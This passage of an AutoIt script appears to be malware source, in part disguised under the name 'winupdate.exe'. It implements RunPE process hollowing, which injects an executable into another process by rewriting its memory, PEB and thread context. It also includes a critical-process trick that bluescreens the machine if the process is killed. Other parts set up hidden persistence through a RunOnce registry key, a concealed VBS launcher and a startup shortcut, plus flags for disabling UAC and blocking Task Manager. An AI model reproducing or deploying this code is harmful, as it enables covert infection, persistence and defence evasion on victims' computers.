        $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
        If @error Then
            __runpe_unmapviewofsection($hprocess, $poptionalheaderimagebasenew)
            $pzeropoint = __runpe_allocateexespaceataddress($hprocess, $poptionalheaderimagebasenew, $ioptionalheadersizeofimagenew)
            If @error Then
                DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
                Return SetError(101, 0, 0)
            EndIf
        EndIf
    EndIf
    DllStructSetData($timage_optional_header, "IMAGEBASE", $pzeropoint)
    #region 7. CONSTRUCT THE NEW MODULE
    Local $tmodule = DllStructCreate("BYTE[" & $ioptionalheadersizeofimagenew & "]")
    Local $pmodule = DllStructGetPtr($tmodule)
    Local $theaders = DllStructCreate("BYTE[" & $ioptionalheadersizeofheadersnew & "]", $pheaders_new)
    DllStructSetData($tmodule, 1, DllStructGetData($theaders, 1))
    Local $timage_section_header
    Local $isizeofrawdata, $ppointertorawdata
    Local $ivirtualaddress, $ivirtualsize
    Local $trelocraw
    For $i = 1 To $inumberofsections
        $timage_section_header = DllStructCreate("CHAR NAME[8];" & "DWORD UNIONOFVIRTUALSIZEANDPHYSICALADDRESS;" & "DWORD VIRTUALADDRESS;" & "DWORD SIZEOFRAWDATA;" & "DWORD POINTERTORAWDATA;" & "DWORD POINTERTORELOCATIONS;" & "DWORD POINTERTOLINENUMBERS;" & "WORD NUMBEROFRELOCATIONS;" & "WORD NUMBEROFLINENUMBERS;" & "DWORD CHARACTERISTICS", $ppointer)
        $isizeofrawdata = DllStructGetData($timage_section_header, "SIZEOFRAWDATA")
        $ppointertorawdata = $pheaders_new + DllStructGetData($timage_section_header, "POINTERTORAWDATA")
        $ivirtualaddress = DllStructGetData($timage_section_header, "VIRTUALADDRESS")
        $ivirtualsize = DllStructGetData($timage_section_header, "UNIONOFVIRTUALSIZEANDPHYSICALADDRESS")
        If $ivirtualsize And $ivirtualsize < $isizeofrawdata Then $isizeofrawdata = $ivirtualsize
        If $isizeofrawdata Then
            DllStructSetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $pmodule + $ivirtualaddress), 1, DllStructGetData(DllStructCreate("BYTE[" & $isizeofrawdata & "]", $ppointertorawdata), 1))
        EndIf
        If $frelocate Then
            If $ivirtualaddress <= $paddressnewbasereloc And $ivirtualaddress + $isizeofrawdata > $paddressnewbasereloc Then
                $trelocraw = DllStructCreate("BYTE[" & $isizebasereloc & "]", $ppointertorawdata + ($paddressnewbasereloc - $ivirtualaddress))
            EndIf
        EndIf
        $ppointer += 40
    Next
    If $frelocate Then __runpe_fixreloc($pmodule, $trelocraw, $pzeropoint, $poptionalheaderimagebasenew, $imagic = 523)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $pzeropoint, "PTR", $pmodule, "DWORD_PTR", $ioptionalheadersizeofimagenew, "DWORD_PTR*", 0)
    If @error Or Not $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(7, 0, 0)
    EndIf
    #region 8. PEB IMAGEBASEADDRESS MANIPULATION
    Local $tpeb = DllStructCreate("BYTE INHERITEDADDRESSSPACE;" & "BYTE READIMAGEFILEEXECOPTIONS;" & "BYTE BEINGDEBUGGED;" & "BYTE SPARE;" & "PTR MUTANT;" & "PTR IMAGEBASEADDRESS;" & "PTR LOADERDATA;" & "PTR PROCESSPARAMETERS;" & "PTR SUBSYSTEMDATA;" & "PTR PROCESSHEAP;" & "PTR FASTPEBLOCK;" & "PTR FASTPEBLOCKROUTINE;" & "PTR FASTPEBUNLOCKROUTINE;" & "DWORD ENVIRONMENTUPDATECOUNT;" & "PTR KERNELCALLBACKTABLE;" & "PTR EVENTLOGSECTION;" & "PTR EVENTLOG;" & "PTR FREELIST;" & "DWORD TLSEXPANSIONCOUNTER;" & "PTR TLSBITMAP;" & "DWORD TLSBITMAPBITS[2];" & "PTR READONLYSHAREDMEMORYBASE;" & "PTR READONLYSHAREDMEMORYHEAP;" & "PTR READONLYSTATICSERVERDATA;" & "PTR ANSICODEPAGEDATA;" & "PTR OEMCODEPAGEDATA;" & "PTR UNICODECASETABLEDATA;" & "DWORD NUMBEROFPROCESSORS;" & "DWORD NTGLOBALFLAG;" & "BYTE SPARE2[4];" & "INT64 CRITICALSECTIONTIMEOUT;" & "DWORD HEAPSEGMENTRESERVE;" & "DWORD HEAPSEGMENTCOMMIT;" & "DWORD HEAPDECOMMITTOTALFREETHRESHOLD;" & "DWORD HEAPDECOMMITFREEBLOCKTHRESHOLD;" & "DWORD NUMBEROFHEAPS;" & "DWORD MAXIMUMNUMBEROFHEAPS;" & "PTR PROCESSHEAPS;" & "PTR GDISHAREDHANDLETABLE;" & "PTR PROCESSSTARTERHELPER;" & "PTR GDIDCATTRIBUTELIST;" & "PTR LOADERLOCK;" & "DWORD OSMAJORVERSION;" & "DWORD OSMINORVERSION;" & "DWORD OSBUILDNUMBER;" & "DWORD OSPLATFORMID;" & "DWORD IMAGESUBSYSTEM;" & "DWORD IMAGESUBSYSTEMMAJORVERSION;" & "DWORD IMAGESUBSYSTEMMINORVERSION;" & "DWORD GDIHANDLEBUFFER[34];" & "DWORD POSTPROCESSINITROUTINE;" & "DWORD TLSEXPANSIONBITMAP;" & "BYTE TLSEXPANSIONBITMAPBITS[128];" & "DWORD SESSIONID")
    $acall = DllCall("KERNEL32.DLL", "BOOL", "ReadProcessMemory", "PTR", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
    If @error Or Not $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(8, 0, 0)
    EndIf
    DllStructSetData($tpeb, "IMAGEBASEADDRESS", $pzeropoint)
    $acall = DllCall("KERNEL32.DLL", "BOOL", "WriteProcessMemory", "HANDLE", $hprocess, "PTR", $ppeb, "PTR", DllStructGetPtr($tpeb), "DWORD_PTR", DllStructGetSize($tpeb), "DWORD_PTR*", 0)
    If @error Or Not $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(9, 0, 0)
    EndIf
    #region 9. NEW ENTRY POINT
    Switch $irunflag
        Case 1
            DllStructSetData($tcontext, "EAX", $pzeropoint + $ientrypointnew)
        Case 2
            DllStructSetData($tcontext, "RCX", $pzeropoint + $ientrypointnew)
        Case 3
    EndSwitch
    #region 10. SET NEW CONTEXT
    $acall = DllCall("KERNEL32.DLL", "BOOL", "SetThreadContext", "HANDLE", $hthread, "PTR", DllStructGetPtr($tcontext))
    If @error Or Not $acall[0] Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(10, 0, 0)
    EndIf
    #region 11. RESUME THREAD
    $acall = DllCall("KERNEL32.DLL", "DWORD", "ResumeThread", "HANDLE", $hthread)
    If @error Or $acall[0] = -1 Then
        DllCall("KERNEL32.DLL", "BOOL", "TerminateProcess", "HANDLE", $hprocess, "DWORD", 0)
        Return SetError(11, 0, 0)
    EndIf
    #region 12. CLOSE OPEN HANDLES AND RETURN PID
    DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hprocess)
    DllCall("KERNEL32.DLL", "BOOL", "CloseHandle", "HANDLE", $hthread)
    Return DllStructGetData($tprocess_information, "PROCESSID")
EndFunc   ;==>_RunPE

Func __runpe_fixreloc($pmodule, $tdata, $paddressnew, $paddressold, $fimagex64)
    Local $idelta = $paddressnew - $paddressold
    Local $isize = DllStructGetSize($tdata)
    Local $pdata = DllStructGetPtr($tdata)
    Local $timage_base_relocation, $irelativemove
    Local $ivirtualaddress, $isizeofblock, $inumberofentries
    Local $tenries, $idata, $taddress
    Local $iflag = 3 + 7 * $fimagex64
    While $irelativemove < $isize
        $timage_base_relocation = DllStructCreate("DWORD VIRTUALADDRESS; DWORD SIZEOFBLOCK", $pdata + $irelativemove)
        $ivirtualaddress = DllStructGetData($timage_base_relocation, "VIRTUALADDRESS")
        $isizeofblock = DllStructGetData($timage_base_relocation, "SIZEOFBLOCK")
        $inumberofentries = ($isizeofblock - 8) / 2
        $tenries = DllStructCreate("WORD[" & $inumberofentries & "]", DllStructGetPtr($timage_base_relocation) + 8)
        For $i = 1 To $inumberofentries
            $idata = DllStructGetData($tenries, 1, $i)
            If BitShift($idata, 12) = $iflag Then
                $taddress = DllStructCreate("PTR", $pmodule + $ivirtualaddress + BitAND($idata, 4095))
                DllStructSetData($taddress, 1, DllStructGetData($taddress, 1) + $idelta)
            EndIf
        Next
        $irelativemove += $isizeofblock
    WEnd
    Return 1
EndFunc   ;==>__runpe_fixreloc

Func __runpe_allocateexespaceataddress($hprocess, $paddress, $isize)
    Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 4096, "DWORD", 64)
    If @error Or Not $acall[0] Then
        $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", $paddress, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
        If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
    EndIf
    Return $acall[0]
EndFunc   ;==>__runpe_allocateexespaceataddress

Func __runpe_allocateexespace($hprocess, $isize)
    Local $acall = DllCall("KERNEL32.DLL", "PTR", "VirtualAllocEx", "HANDLE", $hprocess, "PTR", 0, "DWORD_PTR", $isize, "DWORD", 12288, "DWORD", 64)
    If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
    Return $acall[0]
EndFunc   ;==>__runpe_allocateexespace

Func __runpe_unmapviewofsection($hprocess, $paddress)
    DllCall("NTDLL.DLL", "INT", "NtUnmapViewOfSection", "PTR", $hprocess, "PTR", $paddress)
    If @error Then Return SetError(1, 0, 0)
    Return 1
EndFunc   ;==>__runpe_unmapviewofsection

Func __runpe_iswow64process($hprocess)
    Local $acall = DllCall("KERNEL32.DLL", "BOOL", "IsWow64Process", "HANDLE", $hprocess, "BOOL*", 0)
    If @error Or Not $acall[0] Then Return SetError(1, 0, 0)
    Return $acall[2]
EndFunc   ;==>__runpe_iswow64process

;END OF RUNPE----------------------------------

;PROTECT PROCESS
Global Const $tagrect = "struct;long Left;long Top;long Right;long Bottom;endstruct"
Global Const $tagtoken_privileges = "dword Count;align 4;int64 LUID;dword Attributes"
Global Const $error_no_token = 1008
Global Const $se_privilege_enabled_by_default = 1
Global Const $se_privilege_enabled = 2
Global Const $se_privilege_removed = 4
Global Enum $tokenprimary = 1, $tokenimpersonation
Global Enum $securityanonymous = 0, $securityidentification, $securityimpersonation, $securitydelegation
Global Const $token_assign_primary = 1
Global Const $token_duplicate = 2
Global Const $token_impersonate = 4
Global Const $token_query = 8
Global Const $token_query_source = 16
Global Const $token_adjust_privileges = 32

Func _winapi_getlasterror($curerr = @error, $curext = @extended)
    Local $aresult = DllCall("kernel32.dll", "dword", "GetLastError")
    Return SetError($curerr, $curext, $aresult[0])
EndFunc

Func _security__adjusttokenprivileges($htoken, $fdisableall, $pnewstate, $ibufferlen, $pprevstate = 0, $prequired = 0)
    Local $acall = DllCall("advapi32.dll", "bool", "AdjustTokenPrivileges", "handle", $htoken, "bool", $fdisableall, "struct*", $pnewstate, "dword", $ibufferlen, "struct*", $pprevstate, "struct*", $prequired)
    If @error Then Return SetError(1, @extended, False)
    Return NOT ($acall[0] = 0)
EndFunc

Func _security__getlengthsid($psid)
    If NOT _security__isvalidsid($psid) Then Return SetError(1, @extended, 0)
    Local $acall = DllCall("advapi32.dll", "dword", "GetLengthSid", "struct*", $psid)
    If @error Then Return SetError(2, @extended, 0)
    Return $acall[0]
EndFunc

Func _security__impersonateself($ilevel = $securityimpersonation)
    Local $acall = DllCall("advapi32.dll", "bool", "ImpersonateSelf", "int", $ilevel)
    If @error Then Return SetError(1, @extended, False)
    Return NOT ($acall[0] = 0)
EndFunc

Func _security__isvalidsid($psid)
    Local $acall = DllCall("advapi32.dll", "bool", "IsValidSid", "struct*", $psid)
    If @error Then Return SetError(1, @extended, False)
    Return NOT ($acall[0] = 0)
EndFunc

Func _security__lookupaccountname($saccount, $ssystem = "")
    Local $tdata = DllStructCreate("byte SID[256]")
    Local $acall = DllCall("advapi32.dll", "bool", "LookupAccountNameW", "wstr", $ssystem, "wstr", $saccount, "struct*", $tdata, "dword*", DllStructGetSize($tdata), "wstr", "", "dword*", DllStructGetSize($tdata), "int*", 0)
    If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
    Local $aacct[3]
    $aacct[0] = _security__sidtostringsid(DllStructGetPtr($tdata, "SID"))
    $aacct[1] = $acall[5]
    $aacct[2] = $acall[7]
    Return $aacct
EndFunc

Func _security__lookupprivilegevalue($ssystem, $sname)
    Local $acall = DllCall("advapi32.dll", "bool", "LookupPrivilegeValueW", "wstr", $ssystem, "wstr", $sname, "int64*", 0)
    If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
    Return $acall[3]
EndFunc

Func _security__openthreadtoken($iaccess, $hthread = 0, $fopenasself = False)
    If $hthread = 0 Then $hthread = _winapi_getcurrentthread()
    If @error Then Return SetError(1, @extended, 0)
    Local $acall = DllCall("advapi32.dll", "bool", "OpenThreadToken", "handle", $hthread, "dword", $iaccess, "bool", $fopenasself, "handle*", 0)
    If @error OR NOT $acall[0] Then Return SetError(2, @extended, 0)
    Return $acall[4]
EndFunc

Func _security__openthreadtokenex($iaccess, $hthread = 0, $fopenasself = False)
    Local $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
    If $htoken = 0 Then
        If _winapi_getlasterror() <> $error_no_token Then Return SetError(3, _winapi_getlasterror(), 0)
        If NOT _security__impersonateself() Then Return SetError(1, _winapi_getlasterror(), 0)
        $htoken = _security__openthreadtoken($iaccess, $hthread, $fopenasself)
        If $htoken = 0 Then Return SetError(2, _winapi_getlasterror(), 0)
    EndIf
    Return $htoken
EndFunc

Func _security__setprivilege($htoken, $sprivilege, $fenable)
    Local $iluid = _security__lookupprivilegevalue("", $sprivilege)
    If $iluid = 0 Then Return SetError(1, @extended, False)
    Local $tcurrstate = DllStructCreate($tagtoken_privileges)
    Local $icurrstate = DllStructGetSize($tcurrstate)
    Local $tprevstate = DllStructCreate($tagtoken_privileges)
    Local $iprevstate = DllStructGetSize($tprevstate)
    Local $trequired = DllStructCreate("int Data")
    DllStructSetData($tcurrstate, "Count", 1)
    DllStructSetData($tcurrstate, "LUID", $iluid)
    If NOT _security__adjusttokenprivileges($htoken, False, $tcurrstate, $icurrstate, $tprevstate, $trequired) Then Return SetError(2, @error, False)
    DllStructSetData($tprevstate, "Count", 1)
    DllStructSetData($tprevstate, "LUID", $iluid)
    Local $iattributes = DllStructGetData($tprevstate, "Attributes")
    If $fenable Then
        $iattributes = BitOR($iattributes, $se_privilege_enabled)
    Else
        $iattributes = BitAND($iattributes, BitNOT($se_privilege_enabled))
    EndIf
    DllStructSetData($tprevstate, "Attributes", $iattributes)
    If NOT _security__adjusttokenprivileges($htoken, False, $tprevstate, $iprevstate, $tcurrstate, $trequired) Then Return SetError(3, @error, False)
    Return True
EndFunc

Func _security__sidtostringsid($psid)
    If NOT _security__isvalidsid($psid) Then Return SetError(1, 0, "")
    Local $acall = DllCall("advapi32.dll", "bool", "ConvertSidToStringSidW", "struct*", $psid, "ptr*", 0)
    If @error OR NOT $acall[0] Then Return SetError(2, @extended, "")
    Local $pstringsid = $acall[2]
    Local $ssid = DllStructGetData(DllStructCreate("wchar Text[" & _winapi_stringlenw($pstringsid) + 1 & "]", $pstringsid), "Text")
    _winapi_localfree($pstringsid)
    Return $ssid
EndFunc

Func _security__stringsidtosid($ssid)
    Local $acall = DllCall("advapi32.dll", "bool", "ConvertStringSidToSidW", "wstr", $ssid, "ptr*", 0)
    If @error OR NOT $acall[0] Then Return SetError(1, @extended, 0)
    Local $psid = $acall[2]
    Local $tbuffer = DllStructCreate("byte Data[" & _security__getlengthsid($psid) & "]", $psid)
    Local $tsid = DllStructCreate("byte Data[" & DllStructGetSize($tbuffer) & "]")
    DllStructSetData($tsid, "Data", DllStructGetData($tbuffer, "Data"))
    _winapi_localfree($psid)
    Return $tsid
EndFunc

Func _winapi_closehandle($hobject)
    Local $aresult = DllCall("kernel32.dll", "bool", "CloseHandle", "handle", $hobject)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_createsolidbrush($ncolor)
    Local $aresult = DllCall("gdi32.dll", "handle", "CreateSolidBrush", "dword", $ncolor)
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_deletedc($hdc)
    Local $aresult = DllCall("gdi32.dll", "bool", "DeleteDC", "handle", $hdc)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_deleteobject($hobject)
    Local $aresult = DllCall("gdi32.dll", "bool", "DeleteObject", "handle", $hobject)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_fillrect($hdc, $ptrrect, $hbrush)
    Local $aresult
    If IsPtr($hbrush) Then
        $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "handle", $hbrush)
    Else
        $aresult = DllCall("user32.dll", "int", "FillRect", "handle", $hdc, "struct*", $ptrrect, "dword_ptr", $hbrush)
    EndIf
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_getclassname($hwnd)
    If NOT IsHWnd($hwnd) Then $hwnd = GUICtrlGetHandle($hwnd)
    Local $aresult = DllCall("user32.dll", "int", "GetClassNameW", "hwnd", $hwnd, "wstr", "", "int", 4096)
    If @error Then Return SetError(@error, @extended, False)
    Return SetExtended($aresult[0], $aresult[2])
EndFunc

Func _winapi_getclientrect($hwnd)
    Local $trect = DllStructCreate($tagrect)
    DllCall("user32.dll", "bool", "GetClientRect", "hwnd", $hwnd, "struct*", $trect)
    If @error Then Return SetError(@error, @extended, 0)
    Return $trect
EndFunc

Func _winapi_getcurrentthread()
    Local $aresult = DllCall("kernel32.dll", "handle", "GetCurrentThread")
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_getdc($hwnd)
    Local $aresult = DllCall("user32.dll", "handle", "GetDC", "hwnd", $hwnd)
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_getdesktopwindow()
    Local $aresult = DllCall("user32.dll", "hwnd", "GetDesktopWindow")
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_getmodulehandle($smodulename)
    Local $smodulenametype = "wstr"
    If $smodulename = "" Then
        $smodulename = 0
        $smodulenametype = "ptr"
    EndIf
    Local $aresult = DllCall("kernel32.dll", "handle", "GetModuleHandleW", $smodulenametype, $smodulename)
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_getwindow($hwnd, $icmd)
    Local $aresult = DllCall("user32.dll", "hwnd", "GetWindow", "hwnd", $hwnd, "uint", $icmd)
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_iswindowvisible($hwnd)
    Local $aresult = DllCall("user32.dll", "bool", "IsWindowVisible", "hwnd", $hwnd)
    If @error Then Return SetError(@error, @extended, 0)
    Return $aresult[0]
EndFunc

Func _winapi_lineto($hdc, $ix, $iy)
    Local $aresult = DllCall("gdi32.dll", "bool", "LineTo", "handle", $hdc, "int", $ix, "int", $iy)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_localfree($hmem)
    Local $aresult = DllCall("kernel32.dll", "handle", "LocalFree", "handle", $hmem)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_moveto($hdc, $ix, $iy)
    Local $aresult = DllCall("gdi32.dll", "bool", "MoveToEx", "handle", $hdc, "int", $ix, "int", $iy, "ptr", 0)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_openprocess($iaccess, $finherit, $iprocessid, $fdebugpriv = False)
    Local $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
    If @error Then Return SetError(@error, @extended, 0)
    If $aresult[0] Then Return $aresult[0]
    If NOT $fdebugpriv Then Return 0
    Local $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
    If @error Then Return SetError(@error, @extended, 0)
    _security__setprivilege($htoken, "SeDebugPrivilege", True)
    Local $ierror = @error
    Local $ilasterror = @extended
    Local $iret = 0
    If NOT @error Then
        $aresult = DllCall("kernel32.dll", "handle", "OpenProcess", "dword", $iaccess, "bool", $finherit, "dword", $iprocessid)
        $ierror = @error
        $ilasterror = @extended
        If $aresult[0] Then $iret = $aresult[0]
        _security__setprivilege($htoken, "SeDebugPrivilege", False)
        If @error Then
            $ierror = @error
            $ilasterror = @extended
        EndIf
    EndIf
    _winapi_closehandle($htoken)
    Return SetError($ierror, $ilasterror, $iret)
EndFunc

Func __winapi_parsefiledialogpath($spath)
    Local $afiles[3]
    $afiles[0] = 2
    Local $stemp = StringMid($spath, 1, StringInStr($spath, "\\", 0, -1) - 1)
    $afiles[1] = $stemp
    $afiles[2] = StringMid($spath, StringInStr($spath, "\\", 0, -1) + 1)
    Return $afiles
EndFunc

Func _winapi_releasedc($hwnd, $hdc)
    Local $aresult = DllCall("user32.dll", "int", "ReleaseDC", "hwnd", $hwnd, "handle", $hdc)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_screentoclient($hwnd, ByRef $tpoint)
    Local $aresult = DllCall("user32.dll", "bool", "ScreenToClient", "hwnd", $hwnd, "struct*", $tpoint)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_selectobject($hdc, $hgdiobj)
    Local $aresult = DllCall("gdi32.dll", "handle", "SelectObject", "handle", $hdc, "handle", $hgdiobj)
    If @error Then Return SetError(@error, @extended, False)
    Return $aresult[0]
EndFunc

Func _winapi_stringlenw($vstring)
    Local $acall = DllCall("kernel32.dll", "int", "lstrlenW", "struct*", $vstring)
    If @error Then Return SetError(1, @extended, 0)
    Return $acall[0]
EndFunc
;-------------------------------------------------------------------------------------------------------------------------------------------------
$scriptname = "winupdate.exe"

Func anti_hook()
__bsod($scriptname, True)
EndFunc

$protectprocess = IniRead($uniscriptdir & "\65901.PPZ", "2244034", "6224525", "NotFound")
If $protectprocess = "3244993" Then
    AdlibRegister("anti_hook", 500)
Else
EndIf

Func __bsod($process_name, $bsod_status)
    Local Const $status_success = 0
    Local Const $bsod_class = 29
    Local Const $info_length = 4
    Local Const $process_all_access = 2035711
    Local $result, $process_handle, $process_id, $bsod_struct, $bsod_struct_ptr
    If NOT Call("__DEBUGE_PRIVILEGE", True) Then Return "![>] ERROR : DEBUGE PRIVILEGE OF PROCESS [ " & $process_name & " ] CAN NOT CHANGED"
    $process_id = ProcessExists($process_name)
    If $process_id = 0 Then Return "![>] ERROR : PROCESS [ " & $process_name & " ] NOT EXIST"
    $process_handle = _winapi_openprocess($process_all_access, True, $process_id)
    If @error Then Return "![>] ERROR : CAN NOT OPEN [ " & $process_name & " ] PROCESS"
    $bsod_struct = DllStructCreate("BOOL BSOD_STATUS")
    DllStructSetData($bsod_struct, "BSOD_STATUS", $bsod_status)
    $bsod_struct_ptr = DllStructGetPtr($bsod_struct)
    $result = DllCall("NTDLL.DLL", "DWORD", "NtSetInformationProcess", "HANDLE", $process_handle, "INT", $bsod_class, "PTR", $bsod_struct_ptr, "ULONG", $info_length)
    _winapi_closehandle($process_handle)
    $bsod_struct_ptr = 0
    If $result[0] = $status_success Then
        Return "+[>] BSOD OF PROCESS [ " & $process_name & " ] CHANGED WITH NO ERROR" & @CRLF
    Else
        Return "![>] ERROR : BSOD OF PROCESS [ " & $process_name & " ] NOT CHANGED , ERROR CODE : " & Hex($result[0], 8)
    EndIf
EndFunc

Func __debuge_privilege($status)
    Local $htoken, $ilasterror
    $htoken = _security__openthreadtokenex(BitOR($token_adjust_privileges, $token_query))
    If @error Then Return SetError(@error, @extended, 0)
    $ilasterror = _security__setprivilege($htoken, "SEDEBUGPRIVILEGE", $status)
    _winapi_closehandle($htoken)
    Return $ilasterror
EndFunc

OnAutoItExitRegister("exitme")

Func exitme()
    __bsod($scriptname, False)
EndFunc


;anti botkiller
Local $antibotkill = IniRead($uniscriptdir & "\65901.PPZ", "antibotkill-1", "antibotkill-2", "NotFound")
If $antibotkill = "antibotkill-3" Then
    AdlibRegister("antibotkill", 1000)
Else
EndIf
;-----------------------------------------------------------------------------------------------------
Func antibotkill()
$getstart = RegRead("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path)
if $getstart = $unicode_userprofile & "\\" & $path & "\start.vbs" Then
;do nothing
Else
RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce", $path, "REG_SZ", $unicode_userprofile & "\\" & $path & "\start.vbs")
EndIf

if FileExists($unicode_userprofile & "\\" & $path & "\start.vbs") Then
;do nothing
Else
Local $vbs = FileOpen($unicode_userprofile & "\\" & $path & "\start.vbs", 1)
FileWrite($vbs, 'const Hidden = 0' & @CRLF & 'const WaitOnReturn = true' & @CRLF & 'File ="""' & $unicode_userprofile & "\\" & $path & "\\" & 'start.cmd"""' & @CRLF & 'set WshShell = CreateObject("WScript.Shell")' & @CRLF & 'WshShell.Run file, Hidden, WaitOnReturn' & @CRLF & 'wscript.quit')
FileClose($vbs)
EndIf

if FileExists($unicode_startup & "\start.lnk") Then
;do nothing
Else
FileCreateShortcut($unicode_userprofile & "\\" & $path & "\start.vbs", $unicode_startup & "\start.lnk")
FileSetAttrib($unicode_startup & "\start.lnk","+SH")
EndIf
EndFunc
;-----------------------------------------------------------------------------------------------------
;persistence
Local $persistence = IniRead($uniscriptdir & "\65901.PPZ", "3206254", "5598349", "NotFound")
If $persistence = "4588436" Then
    AdlibRegister("persistence", 500)
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;system hide
Local $systemhide = IniRead($uniscriptdir & "\65901.PPZ", "systemhide1", "systemhide2", "NotFound")
If $systemhide = "systemhide3" Then
AdlibRegister("systemhide",500)
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;antitask
Local $antitask = IniRead($uniscriptdir & "\65901.PPZ", "antitask1", "antitask2", "NotFound")
If $antitask = "antitask3" Then
    AdlibRegister("antitask",500)
Else
EndIf
;-----------------------------------------------------------------------------------------------------
;disable uac
Local $uac = IniRead($uniscriptdir & "\65901.PPZ", "6404000", "6662859", "NotFound")
If $uac = "9455413" Then
    AdlibRegister("disable_uac",500)
Else
EndIf
;-----------------------------------------------------------------------------------------------------

If $uac = "9455413" Then
loop()
EndIf

If $systemhide = "systemhide3" Then
loop()
EndIf

If $antitask = "antitask" Then
loop()
EndIf

If $antibotkill = "antibotkill-3" Then
loop()
EndIf

If $mutex = "mutex3" Then
loop()
EndIf

If $protectprocess = "3244993" Then
    loop()
EndIf

If $persistence = "4588436" Then
loop()
EndIf

func loop()
while 1

If FileExists($unicode_userprofile & "\datascrambler\clean.txt") Then
__bsod($scriptname, False)
EndIf

If WinExists($path) Then
bsod()
Else
EndIf

sleep(100)

WEnd
EndFunc